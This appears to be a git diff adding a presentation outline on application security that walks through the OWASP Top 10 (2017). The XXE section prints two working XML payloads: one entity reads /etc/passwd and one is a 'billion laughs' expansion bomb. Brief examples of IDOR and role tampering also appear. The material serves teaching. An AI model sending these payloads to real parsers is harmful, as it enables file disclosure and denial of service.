Added presentation

1 files changed, 68 insertions, 0 deletions

diff --git a/presentation.txt b/presentation.txt
new file mode 100644
index 0000000..22e4ded
--- /dev/null
+++ b/presentation.txt
@@ -0,0 +1,68 @@
+Application security
+
+What is application security and why is it important?
+
+Most common application vulnerabilities (OWASP TOP 10)
+
+A1:2017 - Injection
+
+A2:2017 - Broken Authentication
+
+A3:2017 - Sensitive Data Exposure
+
+A4:2017 - XML External Entities (XXE)
+
+<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE foo [ 
+    <!ENTITY xxe SYSTEM "file:///etc/passwd"> 
+]>
+<foo>&xxe;</foo>
+
+<?xml version="1.0"?>
+<!DOCTYPE lolz [
+ <!ENTITY lol "lol">
+ <!ELEMENT lolz (#PCDATA)>
+ <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
+ <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
+ <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
+ <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
+ <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
+ <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
+ <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
+ <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
+ <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
+]>
+<lolz>&lol9;</lolz>
+
+
+A5:2017 - Broken Access Control
+
+https://www.website.com/userpage.aspx?id=12
+
+A6:2017 - Security Misconfiguration
+
+A7:2017 - Cross-Site Scripting (XSS)
+
+A8:2017 - Insecure Deserialization
+
+{
+    "id":123,
+    "name":"john",
+    "role":"user"
+}
+
+{
+    "id":1,
+    "name":"admin",
+    "role":"admin"
+}
+
+A9:2017 - Using Components with Known Vulnerabilities
+
+A10:2017 - Insufficient Logging & Monitoring
+
+Buffer overflow
+
+BONUS
+
+Thank you for your attention.